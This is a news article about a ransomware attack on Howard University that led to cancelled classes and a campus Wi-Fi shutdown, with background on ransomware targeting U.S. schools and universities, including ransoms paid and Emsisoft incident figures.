In order to enable its IT team to fully assess the impact of the ransomware attack, Howard University has canceled Tuesday’s classes, opening its campus to essential employees only. Campus Wi-Fi will also be down while the investigation is underway, though cloud-based software will remain available to students and teachers. 

“This is a highly dynamic situation, and it is our priority to protect all sensitive personal, research and clinical data,” the university said. “We are in contact with the FBI and the D.C. city government, and we are installing additional safety measures to further protect the University’s and your personal data from any criminal ciphering.”

But the university warned that that remediation will be “a long haul — not an overnight solution.”

Howard University is the latest in a long line of educational institutions to be hit by ransomware since the start of the pandemic, with the FBI’s Cyber Division recently warning that cybercriminals using this type of attack are focusing heavily on schools and universities due to the widespread shift to remote learning. Last year, the University of California paid $1.14 million to NetWalker hackers after they encrypted data within its School of Medicine’s servers, and the University of Utah paid hackers $457,000 to prevent them from releasing data stolen during an attack on its network. 

According to Emsisoft threat analyst Brett Callow last month, ransomware attacks have disrupted 58 U.S. education organizations and school districts, including 830 individual schools, so far in 2021. Emsisoft estimates that in 2020, 84 incidents disrupted learning at 1,681 individual schools, colleges, and universities.

“We’ll likely see a significant increase in ed sector incidents in the coming weeks,” Callow tweeted on Tuesday.

#california, #cloud-based-software, #crime, #crimes, #cyberattacks, #cybercrime, #federal-bureau-of-investigation, #ransomware, #security, #united-states, #university-of-california, #utah, #washington